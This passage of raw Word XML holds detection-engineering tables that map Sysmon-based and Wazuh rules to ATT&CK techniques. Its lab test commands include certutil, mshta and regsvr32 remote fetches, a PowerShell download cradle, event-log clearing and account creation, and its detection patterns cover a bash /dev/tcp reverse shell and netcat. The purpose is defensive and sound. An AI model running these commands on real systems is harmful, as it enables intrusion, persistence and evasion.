              <w:t xml:space="preserve">Sysmon 1: Image=certutil, CommandLine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certutil -urlcache -f http://lab/x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bf-0003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Whoami discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1033</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: Image=whoami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whoami /all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bf-0004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PowerShell suspicious flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1059.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: CommandLine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powershell -nop -w hidden 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bf-0005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mshta remote script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1218.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: Image=mshta, CommandLine has http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mshta http://lab/a.hta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bf-0006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rundll32 with URL/JS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1218.011</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: Image=rundll32, CommandLine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rundll32 javascript:...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bf-0007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Regsvr32 scriptlet (Squiblydoo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1218.010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: Image=regsvr32, /i:http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regsvr32 /s /i:http://lab/a.sct scrobj.dll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bf-0008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">LSASS process access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1003.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 10: TargetImage=lsass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Run a benign handle-open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bf-0009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scheduled task creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1053.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: Image=schtasks /create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schtasks /create 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bf-0010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">New service via sc.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1543.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: Image=sc.exe create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 create demo binpath=...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bf-0011</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Registry Run key persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1547.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 13: TargetObject has \Run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Add a benign Run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bf-0012</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Office spawning shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1566/T1204</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: Parent=winword, Child=cmd/powershell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Macro that launches cmd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bf-0013</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WMImplant / wmic exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1047</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: Image=wmic, "process call create"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wmic process call create calc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bf-0014</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">BITSAdmin transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1197</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: Image=bitsadmin, /transfer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bitsadmin /transfer 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bf-0015</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Clear event log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1070.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: wevtutil cl / Security 1102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wevtutil cl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bf-0016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Net user account creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1136.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: net user /add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 user demo /add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bf-0017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Suspicious parent-child (svchost spawns cmd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1055/T1036</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: Parent/Child mismatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Custom lab process tree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bf-0018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Encoded + download cradle combo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1059.001, T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: CommandLine IEX+DownloadString</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PowerShell download cradle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bf-0019</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Renamed system binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1036.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: OriginalFileName != Image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Copy cmd.exe to a.exe and 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bf-0020</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ngrok / tunneling tool execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1572</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: Image=ngrok</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Run ngrok in lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="X9ed4795daf3a996413186f28d66ba98ecd3908d"/>
      <w:r>
        <w:t xml:space="preserve">Part B: 20 Wazuh rules (host + correlation + Linux)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wazuh shines at correlation (many events over time) and at Linux/syslog, which complements the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">endpoint-heavy Sigma set.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ATT&amp;CK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/ logic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100201</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PowerShell encoded command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1059.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon decoder + commandLine regex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100202</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Certutil download</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon: image=certutil + urlcache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100203</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Whoami discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1033</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon: image=whoami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100210</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SSH brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1110.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Correlate 6+ failed sshd in 120s, same src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100211</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SSH success after brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1110/T1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Failed burst then accepted from same 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100212</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">New sudoers or sudo to root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1548.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Linux: sudo / visudo activity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100213</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web shell file drop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1505.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">File integrity: new .php in web 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100214</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cron persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1053.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Linux: crontab edits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100215</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">New Linux user / passwd change</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1136</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Linux: useradd / passwd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100216</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reverse shell pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1059.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Linux: bash -i &gt;&amp; /dev/tcp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100217</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Package manager abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1072</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">apt/yum installing from odd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100218</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Auditd: execve of nc/ncat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1095</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Linux auditd execve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100219</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Windows account lockout burst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Correlate 4740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100220</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Multiple 4625 then 4624 (Win brute)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Correlate Windows logon failures then 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100221</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Defender disabled / tamper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1562.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Windows: Defender config change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100222</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Firewall rule added</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1562.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Windows: netsh advfirewall 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100223</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RDP logon from new geo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1021.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4624 LogonType 10 from unusual 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100224</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">File integrity change in /etc</w:t>
